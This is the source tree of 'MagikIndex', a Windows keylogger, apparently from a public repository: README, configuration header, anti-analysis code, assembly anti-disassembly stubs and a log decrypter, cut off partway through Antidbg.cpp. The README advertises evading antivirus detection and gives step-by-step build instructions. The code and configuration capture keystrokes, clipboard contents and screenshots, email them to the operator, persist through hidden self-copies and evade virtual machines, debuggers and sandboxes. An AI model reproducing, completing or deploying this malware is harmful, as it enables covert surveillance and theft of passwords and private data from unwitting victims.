├── MagikVersion.inf ├── logo.h ├── Random.asm ├── log.h ├── Antidbg.h ├── Decrypter └── MagiKrypt.cpp ├── base64.h ├── README.md ├── common.h ├── Antidbg.cpp ├── log.cpp └── MagikIndex.cpp /MagikVersion.inf: -------------------------------------------------------------------------------- 1 | 2.21 2 | [PLACE HERE THE LINK TO THE LATEST EXE] 3 | -------------------------------------------------------------------------------- /logo.h: -------------------------------------------------------------------------------- 1 | char MyLogo[] = { 2 | " __...--~~~~~-._ _.-~~~~~--...__\n // MAGIK `V' \\\\ \n // | INDEX \\\\ \n //__...--~~~~~~-._ | _.-~~~~~~--...__\\\\ \n //__.....----~~~~._\\ | /_.~~~~----.....__\\\\\n====================\\|//====================\n `---` --brat_volk" 3 | }; -------------------------------------------------------------------------------- /Random.asm: -------------------------------------------------------------------------------- 1 | .code 2 | RandomGenerator proc 3 | rdrand eax 4 | ret 5 | RandomGenerator endp 6 | 7 | __AsmImpossibleDisassm proc 8 | push rax 9 | 10 | mov ax, 05EBh ; db 066h, 0B8h, 0EBh, 005h 11 | xor eax, eax ; db 033h, 0C0h 12 | db 074h, 0fah 13 | db 0e8h ; call 14 | 15 | pop rax 16 | ret 17 | __AsmImpossibleDisassm endp 18 | 19 | 20 | __AsmJmpSameTarget proc 21 | jz L_END 22 | jnz L_END 23 | db 0e8h 24 | L_END: 25 | nop 26 | ret 27 | __AsmJmpSameTarget endp 28 | end -------------------------------------------------------------------------------- /log.h: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | std::set getAllThreadIds(); 5 | template 6 | HRESULT CopyItems(__in InputIterator first, __in InputIterator last, __in PCSTR dest); 7 | 8 | 9 | class Log { 10 | private: 11 | 12 | int ExtrapolatedKey; 13 | std::string log; 14 | std::string EncryptMyString(std::string UnencryptedString); 15 | 16 | public: 17 | 18 | void CreateLog(); 19 | void LogItInt(int key_stroke); 20 | void LogItChar(std::string Value); 21 | void SendLog(); 22 | }; 23 | 24 | std::string GetClipBoardTxt(); -------------------------------------------------------------------------------- /Antidbg.h: -------------------------------------------------------------------------------- 1 | struct TrustItems { 2 | bool IsResCheck; 3 | bool IsInVM; 4 | bool IsHostingAVM; 5 | bool IsSmallHardDrive; 6 | bool IsSmallRAM; 7 | bool IsBeingDebugged; 8 | bool HasOneCore; 9 | bool HasMultipleMonitors; 10 | bool HasBeenTimepatched; 11 | bool UserIsInactive; 12 | bool HasActiveInternet; 13 | bool Proxied; 14 | bool HasRunningAntiMalware; 15 | bool HasMoreThan20Apps; 16 | bool ExtUserActivity; 17 | bool IsInHabo; 18 | }; 19 | 20 | class AntiDBG { 21 | public: 22 | int trust; 23 | TrustItems TrustItem; 24 | void Initialize(); 25 | private: 26 | bool ResCheck(); 27 | bool VMGFileCheck(); 28 | bool VMHFileCheck(); 29 | bool HDDCheck(); 30 | bool RAMCheck(); 31 | bool CPUCheck(); 32 | bool MonitorCheck(); 33 | bool PowerCheck(); 34 | bool TimeCheck(); 35 | bool InteractionCheck(); 36 | bool InternetCheck(); 37 | bool AMCheck(); 38 | bool AppCheck(); 39 | bool HaboCucker(); 40 | BOOL BreakpointChecker(); 41 | BOOL BreakpointChecker2(); 42 | bool HybridCucker(); 43 | }; 44 | 45 | -------------------------------------------------------------------------------- /Decrypter/MagiKrypt.cpp: -------------------------------------------------------------------------------- 1 | #define WIN32_LEAN_AND_MEAN 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include "../MagikIndex/base64.h" 7 | FILE* INPUT_FILE; 8 | FILE* OUTPUT_FILE; 9 | std::string DecryptMyString(std::string EncryptedString); 10 | int GetKey(std::string EncryptedString); 11 | bool fexists(const std::string& filename) { 12 | std::ifstream ifile(filename.c_str()); 13 | return (bool)ifile; 14 | } 15 | void main() { 16 | input: 17 | char FilePath[MAX_PATH]; 18 | std::cout << "Full path to the crypted log: "; 19 | std::cin >> FilePath; 20 | std::cout << std::endl; 21 | if (!fexists(FilePath)) { 22 | std::cout << "Invalid file path." << std::endl; 23 | goto input; 24 | } 25 | std::string FileBuffer; 26 | std::string DecryptedBuffer; 27 | std::ifstream InputFile(FilePath); 28 | while(!InputFile.eof()) { 29 | std::getline(InputFile, FileBuffer, ';'); 30 | DecryptedBuffer += DecryptMyString(FileBuffer); 31 | DecryptedBuffer.erase(DecryptedBuffer.size()-4); 32 | } 33 | InputFile.close(); 34 | fopen_s(&OUTPUT_FILE, "DecryptedLog.txt", "a+"); 35 | fprintf(OUTPUT_FILE, "%s", DecryptedBuffer.c_str()); 36 | fclose(OUTPUT_FILE); 37 | std::cout << "Logs decrypted successfully." << std::endl; 38 | Sleep(5000); 39 | exit(1); 40 | } 41 | std::string DecryptMyString(std::string EncryptedString) { 42 | int Key = GetKey(EncryptedString); 43 | std::string CryptedString; 44 | for (int r = 0; r < EncryptedString.size(); r++) { 45 | if (Key % 2 == 0) { 46 | if (EncryptedString[r] % 2 == 0) 47 | CryptedString += (int)EncryptedString[r] - Key - 2; 48 | else 49 | CryptedString += (int)EncryptedString[r] - Key - 4; 50 | } 51 | else { 52 | if (EncryptedString[r] % 2 == 0) 53 | CryptedString += (int)EncryptedString[r] - Key - 1; 54 | else 55 | CryptedString += (int)EncryptedString[r] - Key - 3; 56 | } 57 | } 58 | return CryptedString; 59 | } 60 | int GetKey(std::string EncryptedString) { 61 | std::string Decoded64; 62 | for (int i = 4; i >= 1; i--) { 63 | Decoded64 += EncryptedString[EncryptedString.size() - i]; 64 | } 65 | EncryptedString = Decoded64; 66 | ZeroMemory(&Decoded64, sizeof(Decoded64)); 67 | Base64::decode(EncryptedString, &Decoded64); 68 | return (int)Decoded64[0]; 69 | } -------------------------------------------------------------------------------- /base64.h: -------------------------------------------------------------------------------- 1 | #ifndef BASE64_H 2 | #define BASE64_H 3 | 4 | #include 5 | 6 | const char Base64Alphabet[] = 7 | "ABCDEFGHIJKLMNOPQRSTUVWXYZ" 8 | "abcdefghijklmnopqrstuvwxyz" 9 | "0123456789+/"; 10 | 11 | class Base64 12 | { 13 | public: 14 | static void encode(std::string &in, std::string *out) 15 | { 16 | int i = 0, j = 0; 17 | size_t enc_len = 0; 18 | unsigned char a3[3]; 19 | unsigned char a4[4]; 20 | 21 | out->resize(EncodedLength(in)); //-V106 22 | 23 | int input_len = in.size(); //-V103 24 | std::string::const_iterator input = in.begin(); 25 | 26 | while (input_len--) { 27 | a3[i++] = *(input++); 28 | if (i == 3) { 29 | a3_to_a4(a4, a3); 30 | 31 | for (i = 0; i < 4; i++) { 32 | (*out)[enc_len++] = Base64Alphabet[a4[i]]; 33 | } 34 | 35 | i = 0; 36 | } 37 | } 38 | 39 | if (i) { 40 | for (j = i; j < 3; j++) { 41 | a3[j] = '\0'; 42 | } 43 | 44 | a3_to_a4(a4, a3); 45 | 46 | for (j = 0; j < i + 1; j++) { 47 | (*out)[enc_len++] = Base64Alphabet[a4[j]]; 48 | } 49 | 50 | while ((i++ < 3)) { 51 | (*out)[enc_len++] = '='; 52 | } 53 | } 54 | 55 | for (auto& symbol : *out) 56 | ++symbol; 57 | } 58 | 59 | static void decode(std::string &in, std::string *out) 60 | { 61 | int i = 0, j = 0; 62 | size_t dec_len = 0; 63 | unsigned char a3[3]; 64 | unsigned char a4[4]; 65 | 66 | int input_len = in.size(); //-V103 67 | std::string::const_iterator input = in.begin(); 68 | 69 | out->resize(DecodedLength(in)); //-V106 70 | 71 | for (auto& symbol : in) 72 | --symbol; 73 | 74 | while (input_len--) { 75 | if (*input == '=') { 76 | break; 77 | } 78 | 79 | a4[i++] = *(input++); 80 | if (i == 4) { 81 | for (i = 0; i < 4; i++) { 82 | a4[i] = b64_lookup(a4[i]); 83 | } 84 | 85 | a4_to_a3(a3, a4); 86 | 87 | for (i = 0; i < 3; i++) { 88 | (*out)[dec_len++] = a3[i]; 89 | } 90 | 91 | i = 0; 92 | } 93 | } 94 | 95 | if (i) { 96 | for (j = i; j < 4; j++) { 97 | a4[j] = '\0'; 98 | } 99 | 100 | for (j = 0; j < 4; j++) { 101 | a4[j] = b64_lookup(a4[j]); 102 | } 103 | 104 | a4_to_a3(a3, a4); 105 | 106 | for (j = 0; j < i - 1; j++) { 107 | (*out)[dec_len++] = a3[j]; 108 | } 109 | } 110 | } 111 | 112 | private: 113 | static int DecodedLength(const std::string &in) 114 | { 115 | int numEq = 0; 116 | int n = in.size(); //-V103 117 | 118 | for (std::string::const_reverse_iterator it = in.rbegin(); *it == '='; ++it) { 119 | ++numEq; 120 | } 121 | 122 | return ((6 * n) / 8) - numEq; 123 | } 124 | 125 | inline static int EncodedLength(size_t length) 126 | { 127 | return (length + 2 - ((length + 2) % 3)) / 3 * 4; //-V110 128 | } 129 | 130 | inline static int EncodedLength(const std::string &in) 131 | { 132 | return EncodedLength(in.length()); 133 | } 134 | 135 | inline static void StripPadding(std::string *in) 136 | { 137 | while (!in->empty() && *(in->rbegin()) == '=') in->resize(in->size() - 1); 138 | } 139 | 140 | static inline void a3_to_a4(unsigned char * a4, unsigned char * a3) 141 | { 142 | a4[0] = (a3[0] & 0xfc) >> 2; 143 | a4[1] = ((a3[0] & 0x03) << 4) + ((a3[1] & 0xf0) >> 4); 144 | a4[2] = ((a3[1] & 0x0f) << 2) + ((a3[2] & 0xc0) >> 6); 145 | a4[3] = (a3[2] & 0x3f); 146 | } 147 | 148 | static inline void a4_to_a3(unsigned char * a3, unsigned char * a4) 149 | { 150 | a3[0] = (a4[0] << 2) + ((a4[1] & 0x30) >> 4); 151 | a3[1] = ((a4[1] & 0xf) << 4) + ((a4[2] & 0x3c) >> 2); 152 | a3[2] = ((a4[2] & 0x3) << 6) + a4[3]; 153 | } 154 | 155 | static inline unsigned char b64_lookup(unsigned char c) 156 | { 157 | if (c >= 'A' && c <= 'Z') return c - 'A'; 158 | if (c >= 'a' && c <= 'z') return c - 71; 159 | if (c >= '0' && c <= '9') return c + 4; 160 | if (c == '+') return 62; 161 | if (c == '/') return 63; 162 | return 255; 163 | } 164 | }; 165 | 166 | #endif // BASE64_H -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # ![indekkusu](https://user-images.githubusercontent.com/43145630/139555514-de439851-d18e-4ef4-832b-0845276687b0.png)
MagikIndex V2.2 2 | 3 | 4 | ----------------------------------------------------- 5 | 6 | A magical keylogger from a land far away... 7 | Currently pretty advanced at over 2k lines of code. 8 | 9 | ----------------------------------------------------------------------- 10 | 11 |
Features

12 |

As of 18/07/2022 we are FUD on antiscan and have 2% detection rate on HA. 😎

Retrieves logs to any email address. Even if an internet connection is absent at the time of logging.
Even after it is deleted the logs will still persist and will be sent back anyways.
Crypts all logs, only decryptable with the decrypter.
Auto-updates using GitHub Raw or any other cloud service.
Detects and logs context switches.(changes in the name of the focused window)
Detects Ctrl+C and automatically retrieves the clipboard's contents.
Offers an unencrypted and VM-friendly mode for debugging purposes.
Files are Winzip compressed, with lz4 W.I.P.
ScreenGrabbing is working, with ScreenShot-On-Click and Timer modes.
Grabs lots of info(E.G. Hardware specs, System locale, Windows version, etc.) with more being added with each release.
Pretty persistent: creates multiple copies of itself, so if one is deleted the other ones take its place.
Has a system-wide evaluation and trust system that includes various kinds of VM/debugging/anti-malware checks(some are pretty unusual).
Offers lots of easy customization with #defines at the start of the Common header.

28 | 29 | ----------------------------------------------------------------------- 30 | 31 |
Detection
32 | 33 | Antiscan.me:
34 | ![CFCGBMe1CSZH](https://user-images.githubusercontent.com/43145630/179535170-5fc26649-1613-4c1a-b5b2-36d8a3611d6d.png) 35 | 36 | HybridAnalysis: 37 | ![Hares](https://user-images.githubusercontent.com/43145630/179535733-ae554147-ad36-4d32-a9cc-c34264fb8c62.PNG) 38 | 39 | 40 | 41 | ----------------------------------------------------------------------- 42 | 43 |
How to use:
44 | 45 | Step 1:
46 | Download the source code from this Git repository. 47 | 48 |
Step 2:
49 | Setup 2FA and App Passwords on your "email sender" google account. 50 | 51 |
Step 3:
52 | Create your HardEncode and HardDecode functions to crypt the authentication strings. (you will have to also re-encrypt several pre-encrypted strings)
53 | OR reverse the one i already wrote.
54 | Another possibility is to ditch Auth string encryption, be aware that this exposes strings to reverse engineering. 55 | 56 |
Step 4:
57 | Edit the "common.h" header, customizing the behaviour of the keylogger and adding the encrypted authentication strings. 58 | 59 |
Step 5:
60 | Add "masm" to the project build dependencies.
61 | Make sure that "random.asm" is not excluded from the build, also set its item type as Microsoft Macro Assembler.
62 | Set Project->Linker->System->Subsystem to "WINDOWS".
63 | Set Project->C/C++->Optimization->Whole Program Optimization to "No", Optimization to /Ox and Favor Size Or Speed to "Neither".
64 | Set Project->C/C++->Code Generation->Runtime Library to "/MT Multi-Threaded".
65 | Add the /Zc:trigraphs compiler flag.
66 | Ensure that the project is set to Release x64. 67 | 68 |
Step 6:
69 | Ctrl+shift+b to compile. 70 | 71 |

And here is your compiled, working, binary.

72 | 73 |
Step 7(OPTIONAL):
74 | Set up a Github repo with your compiled binary to auto-update. 75 | 76 | ----------------------------------------------------------------------- 77 | 78 |
Demos
79 | 80 | Unfortunately a single log now takes up more than 4-5 screenshots, so i'll replace them with a link to two demo logs: a crypted and an unencrypted one. 81 | 82 | https://github.com/brat-volk/MagikIndex/raw/development/DemoLogs.zip

83 | 84 | ------------------------------------------------------------------------- 85 | 86 | Don't use my code for some shitty HackForums/RaidForums malware pasta, or at least credit me ;P

87 | Be aware that i don't take any responsibility for the potential harm caused by this program. 88 | -------------------------------------------------------------------------------- /common.h: -------------------------------------------------------------------------------- 1 | #define WIN32_LEAN_AND_MEAN 2 | #ifdef UNICODE 3 | #undef UNICODE 4 | #endif 5 | #define _CRT_SECURE_NO_WARNINGS 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | #include 12 | #include 13 | #include 14 | #include 15 | #include 16 | #include 17 | #include 18 | #include 19 | #include 20 | #include 21 | #include 22 | #include 23 | #include 24 | #include 25 | #include 26 | #include 27 | #include 28 | #include 29 | #include 30 | #include 31 | #include 32 | #include 33 | #include 34 | #include 35 | 36 | 37 | #include "Antidbg.h" 38 | #include "log.h" 39 | //#include "lz4\lz4.h" 40 | #include "base64.h" 41 | 42 | using buffer = std::vector; 43 | 44 | //------------------------------------------------------ 45 | // Customization 46 | //------------------------------------------------------ 47 | 48 | 49 | //[ VERSION INFO ] 50 | #define IsMajor true //let the program know whether its a Dev build or not 51 | #define CurrentVersion "2.21"//current version number 52 | #define GitVersionLink ""//link to GitHub Raw server containing up-to-date version file 53 | 54 | //[ LOGS ] 55 | #define CryptLogs false //whether or not to crypt files 56 | #define KeyShiftLimit 70 //cap for the highest possible random encryption key 57 | #define LogMode 2 //how to log keystrokes [ 1 = Timer , 2 = Characters-per-log ] 58 | #define LogTimer 15 //minutes per log [ must use mode 2 ] 59 | #define CharactersPerLog 800//how many characters should be in a log [ must use mode 1 ] 60 | #define QuitIfUntrust true //should we send a log if the environment is untrusted or quit on the spot? 61 | 62 | //[ SCREENGRABBING ] 63 | #define ScreenGrab true //whether to screenshot at set intervals or not 64 | #define ScreenshotMode 2 //how to screengrab [ 1 = Timer , 2 = Screenshot-On-Click ] 65 | #define ScreenshotDelay 180 //only works when using the timer 66 | #define ScreenshotsPerZip 8 //how many screenshots to collect before sending a zip file 67 | #define ScreenshotCrop true //whether to resize the resulting screenshot (be aware that this will stretch the image if the aspect ratio is different) 68 | #define DestWidth 1920 //compressed screen width 69 | #define DestHeight 1080 //compressed screen height 70 | 71 | //[ EMAIL ] 72 | #define SendersEmail "" 73 | #define SendersPsw "" //IMPORTANT : due to google's cuckhold fetish the "Allow less secure apps" setting has now been removed, you are now required to enable 2-step auth and create an "App Password" for Mail. use the password provided by google in this field. 74 | #define RecieversEmail "" 75 | #define EmailSubject "MagikGlass" // Glass 76 | #define EmailBody "Here are the files you requested" // Glass 77 | #define LogSubject "MagikIndex" // Log 78 | #define LogBody "Here is the draft you requested" // Log 79 | 80 | //[ ANTI-* ] 81 | #define Hyperion false //disables Anti-debugger exception traps in order to enable hyperion packing 82 | #define ShatterAttack false //whether to shatter attack sys utils(cmd,Run,Taskmgmr) KEEP DISABLED IN REALWORLD USAGE! 83 | #define MaxInactivity 10 //max amount of seconds since last input (anti-dbg feature) 84 | #define MinRequiredApps 20 //minimum amount of installed programs (anti-dbg feature) 85 | #define SecurityLevel 2 //0-3 levels of trust towards environment (anti-dbg feature) 86 | #define MinHardDisk 60 //minimum size for the main partition(GB) (anti-dbg feature) 87 | #define DelayExecution false//whether or not execution should be delayed (anti-dbg feature) 88 | #define DelayTime 1000 //amount of time for the delay (seconds) (anti-dbg feature) 89 | #define RequiredRam 2048 //MB (anti-dbg feature) 90 | #define RequiredCores 3 //pretty self explanatory (anti-dbg feature) 91 | 92 | //[ MISC ] 93 | #define MaximumFolderSize 5//limit of MagikIndex copies in a system 94 | #define MaximumFolderLog 5 //limit of MagikLogS copies in a system 95 | 96 | //-------------------------------------------------- 97 | 98 | #define MAX_LENGTH 1024 99 | 100 | #define WINDOWS_SLID \ 101 | { 0x55c92734, \ 102 | 0xd682, \ 103 | 0x4d71, \ 104 | { 0x98, 0x3e, 0xd6, 0xec, 0x3f, 0x16, 0x05, 0x9f } \ 105 | } 106 | 107 | 108 | #pragma comment(lib, "Wininet.lib") 109 | #pragma comment(lib, "Slwga.lib") 110 | #pragma comment( lib, "comsuppw.lib" ) 111 | #pragma comment(lib, "Wbemuuid.lib.") 112 | #pragma comment(lib, "urlmon.lib") 113 | #pragma comment(lib, "Netapi32.lib") 114 | #pragma comment(lib, "shlwapi.lib") 115 | 116 | #define _WIN32_WINNT 0x050 117 | 118 | extern "C" int RandomGenerator(); 119 | extern "C" void __AsmImpossibleDisassm(); 120 | extern "C" void __AsmJmpSameTarget(); 121 | void DeleteDirectory(std::string dir); 122 | int CalculateDirSize(std::string DirectoryToCheck); 123 | void CreateRegistryKey(PCSTR AppName, PCSTR PathToExe); 124 | ULONG WINAPI Protect(LPVOID); 125 | std::string GetCpuInfo(); 126 | BOOL SaveHBITMAPToFile(HBITMAP hBitmap, LPCTSTR lpszFileName); 127 | ULONG WINAPI ScreenGrabber(LPVOID Parameter); 128 | void TakeScreenShot(const char* filename); 129 | BOOL fexists(std::string filename); 130 | void FinalExit(); 131 | //void Compress(const buffer& in, buffer& out); 132 | LRESULT CALLBACK KeyboardThread(int nCode, WPARAM wParam, LPARAM lParam); 133 | LRESULT CALLBACK MouseThread(_In_ int nCode, _In_ WPARAM wParam, _In_ LPARAM lParam); 134 | std::string HardDecode(std::string EncodedString); 135 | int Hooker(int HookType, HOOKPROC CallbackFunc); 136 | void TimerThread(); 137 | std::string RetrieveExternalIp(std::string CurrentDir); 138 | BOOL IsElevated(); 139 | std::string QueryWMI(bstr_t Table, const wchar_t* Item, int Type); 140 | void FirstSetup(); 141 | 142 | typedef std::string String; 143 | typedef std::vector StringVector; 144 | typedef unsigned long long uint64_t; 145 | 146 | typedef long (WINAPI* RtlSetProcessIsCritical) ( 147 | IN BOOLEAN bNew, 148 | OUT BOOLEAN* pbOld, 149 | IN BOOLEAN bNeedScb); 150 | -------------------------------------------------------------------------------- /Antidbg.cpp: -------------------------------------------------------------------------------- 1 | #include "common.h" 2 | 3 | 4 | void AntiDBG::Initialize() { 5 | memset(&TrustItem,false,sizeof(TrustItem)); 6 | trust = 100; 7 | 8 | if (ResCheck() && (!MonitorCheck() && !PowerCheck())) 9 | trust -= 20; 10 | if (VMGFileCheck()) 11 | trust -= 30; 12 | if (VMHFileCheck()) 13 | trust += 30; 14 | if (HDDCheck()) 15 | trust -= 30; 16 | if (RAMCheck()) 17 | trust -= 30; 18 | if (CPUCheck()) 19 | trust -= 30; 20 | if (TimeCheck()) 21 | trust -= 30; 22 | if (HybridCucker()) 23 | exit(0); 24 | if (InteractionCheck()) 25 | trust -= 20; 26 | if(InternetCheck()) 27 | trust += 10; 28 | if(AMCheck()) 29 | trust += 10; 30 | if(AppCheck()) 31 | trust += 10; 32 | if(!Hyperion) 33 | if (IsDebuggerPresent() || BreakpointChecker() || BreakpointChecker2()) { 34 | trust -= 50; 35 | TrustItem.IsBeingDebugged = true; 36 | } 37 | if (HaboCucker()) 38 | FinalExit(); 39 | } 40 | 41 | bool AntiDBG::ResCheck() { 42 | 43 | int x1, y1, x2, y2; 44 | 45 | x1 = GetSystemMetrics(SM_XVIRTUALSCREEN); 46 | y1 = GetSystemMetrics(SM_YVIRTUALSCREEN); 47 | x2 = GetSystemMetrics(SM_CXVIRTUALSCREEN); 48 | y2 = GetSystemMetrics(SM_CYVIRTUALSCREEN); 49 | double w = x2 - x1; 50 | double h = y2 - y1; 51 | 52 | 53 | double Ratios[6] = { 4.0 / 3.0,16.0 / 9.0,21.0 / 9.0,32.0 / 9.0,16.0 / 10.0,5.0 / 4.0 }; 54 | double Ratioed = w / h; 55 | for (int q = 0; q < 6; q++) { 56 | if (Ratioed == Ratios[q]) { 57 | return false; 58 | } 59 | } 60 | TrustItem.IsResCheck = true; 61 | return true; 62 | } 63 | bool AntiDBG::VMGFileCheck() { 64 | LPCSTR BannedFiles[] = { 65 | "ye7PpN2Xodv\\JZ|LZ\\4noemznO|2Y\\2PZgVz3e5;I\\wn4Xer|S", 66 | "|n5ewW4e3;Ydv\\JZ|LZ\\4noemznO|2Y\\2PZgVz3e5;I\\wn4Xer|S", 67 | "ye7PpNkPZfv\\JZ|LZ\\4noemznO|2Y\\2PZgVz3e5;I\\wn4Xer|S", 68 | "OZg|7EevT4Ov\\JZ|LZ\\4noemznO|2Y\\2PZgVz3e5;I\\wn4Xer|S", 69 | "|n5ewm4[v\\JZ|LZ\\4noemznO|2Y\\2PZgVz3e5;I\\wn4Xer|S", 70 | "OZg|7{eofIcv\\JZ|LZ\\4noemznO|2Y\\2PZgVz3e5;I\\wn4Xer|S", 71 | "ye7PpNuT5[vXYdv\\JZ|LZ\\4noemznO|2Y\\2PZgVz3e5;I\\wn4Xer|S", 72 | "ye7PpN4iFgv\\JZ|LZ\\4noemznO|2Y\\2PZgVz3e5;I\\wn4Xer|S", 73 | "ye7PpNtPJ\\5Hoev\\JZ|LZ\\4noemznO|2Y\\2PZgVz3e5;I\\wn4Xer|S", 74 | "|n5ewW4e3;YdkPZfv\\JZ|LZ\\4noemznO|2Y\\2PZgVz3e5;I\\wn4Xer|S", 75 | "ye7PpNkT4cv\\JZ|LZ\\4noemznO|2Y\\2PZgVz3e5;I\\wn4Xer|S", 76 | "ye7PpNonoenPZf2Xodv\\JZ|LZ\\4noemznO|2Y\\2PZgVz3e5;I\\wn4Xer|S", 77 | "OZg|7kenTJejTY[2Xodv\\JZ|LZ\\4noemznO|2Y\\2PZgVz3e5;I\\wn4Xer|S", 78 | "OZg|7U\\|X5dPj5dE\\HZ|LZ\\4noemznO|2Y\\2PZgVz3e5;I\\wn4Xer|S", 79 | "OZg|7Ef|XYfJj5dE\\HZ|LZ\\4noemznO|2Y\\2PZgVz3e5;I\\wn4Xer|S", 80 | "OZg|7kTVj5dE\\HZ|LZ\\4noemznO|2Y\\2PZgVz3e5;I\\wn4Xer|S", 81 | "OZg|7{dnTYcYj5dE\\HZ|LZ\\4noemznO|2Y\\2PZgVz3e5;I\\wn4Xer|S", 82 | "yIdm7Ee|nI\\6;o[4znO|2Y\\2PZgVz3e5;I\\wn4Xer|S", 83 | "yIdm7{cx;Ic6;o[4znO|2Y\\2PZgVz3e5;I\\wn4Xer|S", 84 | "uzI\\wCpd6LZd6;o[4znO|2Y\\2PZgVz3e5;I\\wn4Xer|S", 85 | "CduToNuf4d6;o[4znO|2Y\\2PZgVz3e5;I\\wn4Xer|S", 86 | "uzI\\wWJe|nZ[{LZ[uf4d6;o[4znO|2Y\\2PZgVz3e5;I\\wn4Xer|S", 87 | "CduToNunIf3L5[uf4d6;o[4znO|2Y\\2PZgVz3e5;I\\wn4Xer|S", 88 | "uzI\\wWJe|L5d{LZ\\uf4d6;o[4znO|2Y\\2PZgVz3e5;I\\wn4Xer|S", 89 | "uzI\\wWJe|v4[jLI\\nXo\\uf4d6;o[4znO|2Y\\2PZgVz3e5;I\\wn4Xer|S", 90 | "yIdm7UfyP5clHIeuf4d6;o[4znO|2Y\\2PZgVz3e5;I\\wn4Xer|S", 91 | "uzI\\wWJe|j4\\3;oeqT5e|HIeuf4d6;o[4znO|2Y\\2PZgVz3e5;I\\wn4Xer|S", 92 | "WIgn7U\\lnof{X4e6;o[4znO|2Y\\2PZgVz3e5;I\\wn4Xer|S", 93 | "WIgn7UgjLJf6;o[4znO|2Y\\2PZgVz3e5;I\\wn4Xer|S", 94 | "WIgn7EdxLJfw;4S6;oSYznO|2Y\\2PZgVz3e5;I\\wn4Xer|S", 95 | "|n5ew64dxzIdjLIZ|LZ\\4noemznO|2Y\\2PZgVz3e5;I\\wn4Xer|S", 96 | "OZg|7Ud4vIfn7IZ|LZ\\4noemznO|2Y\\2PZgVz3e5;I\\wn4Xer|S", 97 | "|n5ewOYcwHIe4DJZ|LZ\\4noemznO|2Y\\2PZgVz3e5;I\\wn4Xer|S", 98 | "ye7PpN|\\4dr\\JZ|LZ\\4noemznO|2Y\\2PZgVz3e5;I\\wn4Xer|S", 99 | "ye7PpNxTYfyf4dr\\JZ|LZ\\4noemznO|2Y\\2PZgVz3e5;I\\wn4Xer|S", 100 | "ye7PpN2XJewn4dr\\JZ|LZ\\4noemznO|2Y\\2PZgVz3e5;I\\wn4Xer|S", 101 | "OZg|7{\\wL5dr\\JZ|LZ\\4noemznO|2Y\\2PZgVz3e5;I\\wn4Xer|S", 102 | "|n5ewm4elP5dr\\JZ|LZ\\4noemznO|2Y\\2PZgVz3e5;I\\wn4Xer|S", 103 | "OZg|7kenP5dr\\JZ|LZ\\4noemznO|2Y\\2PZgVz3e5;I\\wn4Xer|S", 104 | "|n5ewK5d2P5dr\\JZ|LZ\\4noemznO|2Y\\2PZgVz3e5;I\\wn4Xer|S", 105 | "y3o[wKZ[k;4dozX[er|S", 106 | "Cf6TpN|Toexf5e|HIeer|S", 107 | "2jJfwyYcj3Y\\er|S", 108 | "vTJcwyYcj3Y\\er|S", 109 | "O4dm7{c{;4fer|S", 110 | "6P4dm7{c{;4fer|S", 111 | "OJd67{c{;4fer|S" 112 | }; 113 | 114 | for (int i = 0; i < sizeof(BannedFiles)/ sizeof(BannedFiles[0]); i++) { 115 | if (fexists(HardDecode(BannedFiles[i]))) { 116 | goto EscapeLabel; 117 | } 118 | } 119 | 120 | LPVOID drivers[1024]; 121 | DWORD cbNeeded; 122 | int cDrivers, i; 123 | if (K32EnumDeviceDrivers(drivers, sizeof(drivers), &cbNeeded) && cbNeeded < sizeof(drivers)) 124 | { 125 | char szDriver[1024]; 126 | cDrivers = cbNeeded / sizeof(drivers[0]); 127 | for (i = 0; i < cDrivers; i++) 128 | { 129 | if (K32GetDeviceDriverBaseNameA(drivers[i], szDriver, sizeof(szDriver) / sizeof(szDriver[0]))) 130 | { 131 | if (szDriver == HardDecode("ye7PpNnPZfx3GgxLmX") || szDriver == HardDecode("ye7PpNxXI\r\HgxLmX") || szDriver == HardDecode("ye7PpN2PZ\3fGgxLmX")) 132 | goto EscapeLabel; 133 | } 134 | } 135 | } 136 | 137 | return false; 138 | 139 | EscapeLabel: 140 | TrustItem.IsInVM = true; 141 | return true; 142 | } 143 | bool AntiDBG::VMHFileCheck() { 144 | LPCSTR BannedFiles[] = { 145 | "|n5ew[peGj5dE\\HZ|LZ\\4noemznO|2Y\\2PZgVz3e5;I\\wn4Xer|S", 146 | "4CJ\\DTZ\\Qj5dE\\HZ|LZ\\4noemznO|2Y\\2PZgVz3e5;I\\wn4Xer|S", 147 | "|n5ew[4fOTZ\\Qj5dE\\HZ|LZ\\4noemznO|2Y\\2PZgVz3e5;I\\wn4Xer|S", 148 | "|n5ew64dPL2WXj5dE\\HZ|LZ\\4noemznO|2Y\\2PZgVz3e5;I\\wn4Xer|S" 149 | }; 150 | 151 | for (int i = 0; i < sizeof(BannedFiles) / sizeof(BannedFiles[0]); i++) { 152 | if (fexists(HardDecode(BannedFiles[i]))) { 153 | TrustItem.IsHostingAVM = true; 154 | return true; 155 | } 156 | } 157 | 158 | return false; 159 | 160 | } 161 | bool AntiDBG::HDDCheck() { 162 | ULARGE_INTEGER total_bytes; 163 | HANDLE drive; 164 | BOOL result; 165 | GET_LENGTH_INFORMATION size; 166 | DWORD lpBytesReturned; 167 | drive = CreateFileA("\\\\.\\PhysicalDrive0", GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL); 168 | if (drive == INVALID_HANDLE_VALUE) { 169 | CloseHandle(drive); 170 | return false; 171 | }else{ 172 | result = DeviceIoControl(drive, IOCTL_DISK_GET_LENGTH_INFO, NULL, 0, &size, sizeof(GET_LENGTH_INFORMATION), &lpBytesReturned, NULL); 173 | CloseHandle(drive); 174 | if (result != 0) { 175 | if (size.Length.QuadPart / 1073741824 <= MinHardDisk) { 176 | TrustItem.IsSmallHardDrive = true; 177 | return true; 178 | } 179 | } 180 | } 181 | if (GetDiskFreeSpaceExA("C:\\", NULL, &total_bytes, NULL)) 182 | { 183 | if (total_bytes.QuadPart / 1073741824 <= MinHardDisk) { 184 | TrustItem.IsSmallHardDrive = true; 185 | return true; 186 | //add additional flag, since someone is trying to bamboozle me by hooking DeviceIoControl 187 | } 188 | } 189 | return false; 190 | } 191 | bool AntiDBG::RAMCheck() { 192 | MEMORYSTATUSEX RAMStatus; 193 | RAMStatus.dwLength = sizeof(RAMStatus); 194 | GlobalMemoryStatusEx(&RAMStatus); 195 | DWORD Ram = ((RAMStatus.ullTotalPhys / 1024) / 1024); 196 | if ((DWORD)2048 > Ram) { 197 | TrustItem.IsSmallRAM = true; 198 | return true; 199 | } 200 | return false; 201 | } 202 | bool AntiDBG::CPUCheck() 